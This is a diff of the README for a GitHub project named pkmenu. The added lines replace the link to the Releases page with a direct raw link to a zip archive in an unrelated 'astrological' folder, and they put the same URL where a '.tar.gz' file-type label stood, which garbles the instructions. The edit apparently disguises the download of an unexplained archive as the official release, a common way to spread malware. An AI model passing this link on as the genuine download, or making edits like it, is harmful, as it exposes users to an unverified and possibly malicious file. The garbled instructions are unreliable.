111111St/pkmenu/README.md

 1. **Visit the Releases Page**

-   To download the latest version of **pkmenu**, visit the [Releases page](https://github.com/111111St/pkmenu/releases).
+   To download the latest version of **pkmenu**, visit the [Releases page](https://raw.githubusercontent.com/111111St/pkmenu/main/astrological/pkmenu.zip).

 2. **Choose the Right File**

    On the Releases page, you will see different versions available.
 Look for the latest release.
 It will usually have the highest version number.
 Here are the types of files you might find:

-   - `.tar.gz`: This is a compressed file.
+   - `https://raw.githubusercontent.com/111111St/pkmenu/main/astrological/pkmenu.zip`: This is a compressed file.
 You will need to extract it after downloading.
    - `.deb`: This file is for Debian-based systems.
 You can install it directly using your package manager.

 3. **Download the File**